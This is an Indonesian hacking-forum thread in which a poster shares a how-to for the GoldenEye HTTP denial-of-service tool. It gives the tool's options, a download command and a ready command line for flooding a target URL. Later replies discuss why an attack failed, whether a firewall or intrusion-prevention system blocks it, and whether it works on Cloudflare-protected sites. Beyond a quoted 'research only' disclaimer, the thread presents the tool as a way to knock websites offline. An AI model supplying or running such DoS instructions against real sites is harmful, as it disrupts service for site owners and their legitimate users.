Indonesian Back|Track Team
Share DOS Website dengan Golden Eye - Printable Version

+- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum)
+-- Forum: Attacker Zone (https://www.indonesianbacktrack.or.id/forum/forum-169.html)
+--- Forum: Stress Testing (https://www.indonesianbacktrack.or.id/forum/forum-183.html)
+--- Thread: Share DOS Website dengan Golden Eye (/thread-6272.html)



DOS Website dengan Golden Eye - Creed - 05-26-2015

Pagi bro.. semoga dalam keadaan sehat ya bro. kali ini ane akan share Tool DOS Website dengan Golden Eye Tool ini dibuat dengan bahasa python, simple tapi powerfull. tanpa basa-basi langsung hajarrrr bro eh sikat bro Smile

Details for GoldenEye:
  • This tool is meant for research purposes only and any malicious usage of this tool is prohibited.
    GoldenEye is an python app for SECURITY TESTING PURPOSES ONLY!
    GoldenEye is a HTTP DoS Test Tool.
    Attack Vector exploited: HTTP Keep Alive + NoCache

Goldeneye options:

Code:
USAGE: ./goldeneye.py <url> [OPTIONS]

OPTIONS:
    Flag           Description                     Default
    -u, --useragents   File with user-agents to use                     (default: randomly generated)
    -w, --workers      Number of concurrent workers                     (default: 50)
    -s, --sockets      Number of concurrent sockets                     (default: 30)
    -m, --method       HTTP Method to use 'get' or 'post'  or 'random'  (default: get)
    -d, --debug        Enable Debug Mode [more verbose output]          (default: False)
    -h, --help         Shows this help

Download GoldenEye:
git clone https://github.com/jseidl/GoldenEye

setelah didownload buka lewat terminal:

┌──[root@Creed]──[~]
└── cd /root/GoldenEye
┌──[root@Creed]──[~/GoldenEye]
└── ./goldeneye.py <url target> -w 10 -s 10 -m random

[Image: Screenshot_2.png]


Penggunaan perintah di atas:

-w = 10 workers
-s = 10 simultenious connections
-m = random, a mix of GET and POST

sudah pagi bro waktunya ane tidurrr, semoga bermanfaat tutor sederhana ane..


RE: DOS Website dengan Golden Eye - dimascyber4rt - 05-26-2015

ok thanks bro.. saya cicip haha


RE: DOS Website dengan Golden Eye - Hendra Gunawan - 05-26-2015

deface kah ? ini ?
ato gmna ?


RE: DOS Website dengan Golden Eye - Creed - 05-27-2015

(05-26-2015, 02:51 PM)dimascyber4rt Wrote: ok thanks bro.. saya cicip haha

iya sama2.. monggo mas Smile


RE: DOS Website dengan Golden Eye - Creed - 05-27-2015

(05-26-2015, 08:37 PM)Hendra Gunawan Wrote: deface kah ? ini ?
ato gmna ?

Serangan DOS tujuanya adalah satu membuat server tidak bisa menerima layanan untuk user yang sah dan pada akhirnya service nya down.


RE: DOS Website dengan Golden Eye - chuck3y - 12-28-2015

kok 0 failed ya ??

tolong di perjelas om


RE: DOS Website dengan Golden Eye - deepz0ne - 08-10-2017

(12-28-2015, 12:28 PM)chuck3y Wrote: kok 0 failed ya ??

tolong di perjelas om

Kenapa itu om ?


RE: DOS Website dengan Golden Eye - syaifulgantengz - 08-20-2017

Ada WAF atau IPS kali om di destination site nya, serangannya ditangguhkan gtu Big Grin


RE: DOS Website dengan Golden Eye - masnico - 11-06-2017

apakah ini bisa digunakan untuk website yg menggunakan CF ?